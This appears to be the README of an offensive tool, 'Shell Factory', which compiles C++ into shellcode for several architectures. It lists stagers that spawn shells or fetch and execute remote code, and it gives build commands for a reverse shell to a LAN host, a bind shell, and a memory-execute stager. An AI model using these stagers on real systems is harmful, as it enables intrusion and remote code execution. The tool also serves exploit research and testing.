Shellcode Builder: Shell Factory

Shell Factory is a framework for compiling shellcodes from a C++ source for multiple systems and architectures.

It is composed of multiple parts:



a Rakefile for compiling and linking against different compilers and architectures.
the factory, a set of C++ headers to generate system calls for different systems and architectures.
picolib, a generic C++ library relying on the system call factory to abstract interactions the target system.
The shellcode is compiled as a single compilation unit with common optimizations to reduce its code size.

The resulting file is supposed to be a single binary blob executable from anywhere in memory, starting at offset 0.



Requirements

Rake


Linux

binutils
g++ or clang++


OS X

Xcode command-line tools


Basic usage

Put your shellcode source file in the shellcodes directory, then compile it with rake <shellcode>.

For example, create a template file named shellcodes/template.cc :

#include <factory.h>
#include <pico.h>

using namespace Pico;

SHELLCODE_ENTRY {
    Process::exit(0);
}
Then compile it with: rake template. On a Linux amd64 system, this will generate the files bins/template.elf and bins/template.x86_64-linux.bin.

$ objdump -d bins/template.elf

00000000004000b0 <_start>:
  4000b0:       31 ff                   xor    %edi,%edi
  4000b2:       b8 e7 00 00 00          mov    $0xe7,%eax
  4000b7:       0f 05                   syscall


Default shellcodes

Three generic stager shellcodes are provided in the shellcodes directory:

shellexec : runs a standard /bin/sh shell or any specified command.
memexec : allocates executable memory, receives data and executes it.
dropexec : reads data, drops an executable file on the system and executes it.


Channels

Channels are an abstraction layer that allows to use different kind of data streams configurable through compilation variables: files, sockets, opened file descriptors.

They are typically used by shellexec, memexec and dropexec to receive and send data. The default channels used are the standard input/output when none are specified.



Examples

Reverse shell on the local network

rake shellexec CHANNEL=TCP_CONNECT HOST=192.168.0.2 PORT=2222


Bind-shell TCPv6

rake shellexec CHANNEL=TCP6_LISTEN HOST=::1 PORT=1111


Reverse memory execute over SCTPv6

rake memexec CHANNEL=SCTP6_CONNECT HOST=fe80::800:27ff:fe00:0 PORT=3333


Supported targets

x86 amd64 ARM Aarch24 PowerPC SH4 MIPS
Linux ✓ ✓ ✓ ✓ ✓ ✓ ∼
FreeBSD ✓ ∼
OS X ∼
Items marked as ∼ are a work in progress and are not fully implemented yet.


Download